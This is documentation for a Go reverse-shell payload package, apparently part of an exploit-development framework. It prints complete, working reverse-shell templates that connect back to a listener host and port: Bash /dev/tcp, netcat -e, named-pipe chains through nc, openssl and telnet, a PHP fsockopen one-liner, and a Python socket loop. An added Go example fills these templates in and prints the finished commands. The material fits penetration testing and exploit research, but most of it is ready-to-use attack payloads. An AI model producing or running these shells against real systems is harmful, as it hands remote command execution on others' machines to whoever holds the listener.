Overview ¶
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow several styles of composition while acknowledging that payloads are almost always string or byte oriented. With this in mind, each payload may be produced either from a constructed type or by formatting the raw constant directly.
For example, the netcat payload can be produced through the constructed type's Default method, through a named method on that type, or by formatting the raw constant with fmt.Sprintf:

    reverse.Netcat.Default("127.0.0.1", 1337)
    reverse.Netcat.Mknod("127.0.0.1", 1337)
    fmt.Sprintf(reverse.NetcatMknod, "127.0.0.1", 1337)

Note that these three do not all yield the same string: NetcatDefault is NetcatGaping (`nc -e`), while the NetcatMknod constant carries a `%s` verb for the FIFO path in addition to the host and port verbs, so the raw fmt.Sprintf form must be given the path argument for each of those verbs as well or the verbs are left unfilled.
Each of the defined payload types should utilize a Default reverse shell constant that corresponds to the most common case.
Constants ¶
    const (
    	BashDefault        = BashTCPRedirection
    	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
    )

    const (
    	GJScriptDefault   = GJScriptGLibSpawn
    	GJScriptGLibSpawn = `` /* 528-byte string literal not displayed */
    )

    const (
    	JavaDefault                   = JavaProcessBuilderInteractive
    	JavaProcessBuilderInteractive = `` /* 670-byte string literal not displayed */
    )

    const (
    	NetcatDefault = NetcatGaping
    	NetcatGaping  = `nc %s %d -e /bin/sh`
    	NetcatMknod   = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;`
    )

    const (
    	OpenSSLDefault = OpenSSLMknod
    	OpenSSLMknod   = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`
    	OpenSSLMkfifo  = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`
    )

    const (
    	PHPDefault          = PHPLinuxInteractive
    	PHPLinuxInteractive = `<? $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`
    	PHPUnflattened      = `` /* 1000-byte string literal not displayed */
    )

    const (
    	PythonDefault = Python27
    	Python27 = "import socket\n" +
    		"import subprocess\n" +
    		"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
    		"s.connect(('%s', %d))\n" +
    		"while 1:\n" +
    		"    data = s.recv(1024).decode('UTF-8')\n" +
    		"    if data == 'exit\\n':\n" +
    		"        break\n" +
    		"    if len(data) > 0:\n" +
    		"        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" +
    		"        s.send(proc.stdout.read() + proc.stderr.read())\n" +
    		"s.close()\n"
    	Python27Secure = "import socket\n" +
    		"import subprocess\n" +
    		"import ssl\n" +
    		"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
    		"s.connect(('%s', %d))\n" +
    		"sslsock = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)\n" +
    		"while 1:\n" +
    		"    data = sslsock.recv(1024).decode('UTF-8')\n" +
    		"    if data == 'exit\\n':\n" +
    		"        break\n" +
    		"    if len(data) > 0:\n" +
    		"        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" +
    		"        sslsock.send(proc.stdout.read() + proc.stderr.read())\n" +
    		"sslsock.close()\n"
    )

    const (
    	TelnetDefault       = TelnetMknod
    	TelnetMknod         = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;`
    	TelnetMknodNoColon  = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;`
    	TelnetMkfifo        = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;`
    	TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;`
    )
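The raw constants above take the listener host and port through fmt verbs, but the mknod/mkfifo variants also repeat a `%s` for the FIFO path, and the host is spliced into shell text (inside single quotes in the Bash template), so a host string containing a quote or `;` would corrupt or escape the command. The following is an added example, not code from go-exploit: it copies four of the templates from this page into local constants and adds assumed helpers (validateTarget, fillTemplate, randomFIFO, Build) that reject unsafe host strings and fill the verbs by position, treating the `%s` immediately before the single `%d` as the host and every other `%s` as the FIFO path.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"net"
	"regexp"
	"strings"
)

// Templates copied verbatim from the reverse package constants on this page.
const (
	bashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
	netcatGaping       = `nc %s %d -e /bin/sh`
	netcatMknod        = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;`
	openSSLMkfifo      = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`
)

// hostnameRE is a conservative RFC 1123 hostname check. Anything that is not an IP
// literal and does not match it is refused, so quotes, spaces and shell
// metacharacters can never reach the command text. (Assumed helper, not the project's.)
var hostnameRE = regexp.MustCompile(`^([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)*[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$`)

// verbRE matches the only two verbs the templates use.
var verbRE = regexp.MustCompile(`%[sd]`)

// validateTarget refuses ports outside 1-65535 and hosts that are neither an IP
// literal nor a plain hostname.
func validateTarget(lhost string, lport int) error {
	if lport < 1 || lport > 65535 {
		return fmt.Errorf("lport %d out of range", lport)
	}
	if net.ParseIP(lhost) != nil {
		return nil
	}
	if !hostnameRE.MatchString(lhost) {
		return fmt.Errorf("lhost %q is not an IP literal or hostname", lhost)
	}
	return nil
}

// randomFIFO returns a short random file name; the templates cd into /tmp first,
// so a bare name is enough and avoids colliding with a stale pipe from an earlier run.
func randomFIFO() string {
	b := make([]byte, 4)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return "f" + hex.EncodeToString(b)
}

// fillTemplate walks the verbs in order: the single %d is the port, the %s right
// before it is the host, and every other %s is the FIFO path. Templates without a
// FIFO (bash, nc -e) simply never use the fifo argument.
func fillTemplate(tmpl, fifo, lhost string, lport int) (string, error) {
	if strings.Count(tmpl, "%d") != 1 {
		return "", errors.New("template must carry exactly one port verb")
	}
	verbs := verbRE.FindAllString(tmpl, -1)
	args := make([]interface{}, 0, len(verbs))
	for i, v := range verbs {
		switch {
		case v == "%d":
			args = append(args, lport)
		case i+1 < len(verbs) && verbs[i+1] == "%d":
			args = append(args, lhost)
		default:
			args = append(args, fifo)
		}
	}
	return fmt.Sprintf(tmpl, args...), nil
}

// Build validates the listener address, then renders the template with a fresh FIFO name.
func Build(tmpl, lhost string, lport int) (string, error) {
	if err := validateTarget(lhost, lport); err != nil {
		return "", err
	}
	return fillTemplate(tmpl, randomFIFO(), lhost, lport)
}

func main() {
	for _, t := range []string{bashTCPRedirection, netcatGaping, netcatMknod, openSSLMkfifo} {
		p, err := Build(t, "10.0.0.5", 4444) // constructed sample listener address
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Println(p)
	}
	// A host that would close the Bash template's single quote is refused up front.
	_, err := Build(bashTCPRedirection, "10.0.0.5'; id #", 4444)
	fmt.Println("injection attempt rejected:", err != nil)
}
```

The same positional rule covers the Telnet constants on this page (in TelnetMkfifo the host `%s` precedes `%d` and the remaining three `%s` are the pipe), so one filler serves every mknod/mkfifo template rather than a hand-built argument list per constant.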
Variables ¶
var Bash = &BashPayload{}
Makes the Bash payloads accessible via `reverse.Bash`
var GJScript = &GJScriptPayload{}
var JJS = &JJSScriptPayload{}
var Java = &JavaPayload{}
var Netcat = &NetcatPayload{}
var OpenSSL = &OpenSSLPayload{}
var PHP = &PHPPayload{}
var Python = &PythonPayload{}
var Telnet = &TelnetPayload{}
Functions ¶
This section is empty.
Types ¶
type BashPayload ¶
type BashPayload struct{}
Defines the default Bash struct and all associated payload functions
func (*BashPayload) Default ¶
func (bash *BashPayload) Default(lhost string, lport int) string
The default Bash payload uses bash's `/dev/tcp/` pseudo-device redirection. This is a feature of the shell itself rather than a real device node, and it is only available when bash was built with network redirections enabled.
Example ¶
    package main

    import (
    	"fmt"

    	"github.com/vulncheck-oss/go-exploit/payload/reverse"
    )

    func main() {
    	fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
    	// Output:
    	// bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
    }
func (*BashPayload) TCPRedirection ¶
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string
Utilizes the bash networking pseudo `/dev/tcp/` functionality to create a reverse bash shell.
type GJScriptPayload ¶
type GJScriptPayload struct{}
type JJSScriptPayload ¶
type JJSScriptPayload struct{}
func (*JJSScriptPayload) Default ¶
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string
Generates a script that can be used to create a reverse shell via jjs (the Nashorn JavaScript shell bundled with Java 8 through 14). This is an adapted version of Frohoff's original gist. Additionally, the logic that disables TLS hostname validation was adapted from a blog post by Callan Howell-Pavia.
The script autodetects whether the platform is Windows and provides a 'cmd.exe' shell; otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload ¶
type JavaPayload struct{}
func (*JavaPayload) Default ¶
func (java *JavaPayload) Default(lhost string, lport int) string
Defaults to the UnflattenedJava payload
func (*JavaPayload) UnflattenedJava ¶
func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
type NetcatPayload ¶
type NetcatPayload struct{}
type OpenSSLPayload ¶
type OpenSSLPayload struct{}
func (*OpenSSLPayload) Default ¶
func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload ¶
type PHPPayload struct{}
func (*PHPPayload) LinuxInteractive ¶
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
func (*PHPPayload) Unflattened ¶
Creates a reverse shell using PHP, optionally wrapped in TLS. The user specifies the shell to run (for example cmd.exe or /bin/sh) and whether the connection should be encrypted.

    reverse.PHP.Unflattened("10.9.49.80", 1270, "/bin/sh", true)
type PythonPayload ¶
type PythonPayload struct{}
func (*PythonPayload) Python27 ¶
func (py *PythonPayload) Python27(lhost string, lport int) string
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func (*PythonPayload) SecurePython27 ¶
func (py *PythonPayload) SecurePython27(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket and works on Python 2.7, 3+, Windows and Linux. The payload calls ssl.wrap_socket with cert_reqs=ssl.CERT_NONE, so it does not verify the listener's certificate; note that ssl.wrap_socket was deprecated in Python 3.7 and removed in Python 3.12, so this payload will not run on 3.12 or later.
type Reverse ¶
    type Reverse interface {
    	Default
    }
Defines the Default function to be created for each type of payload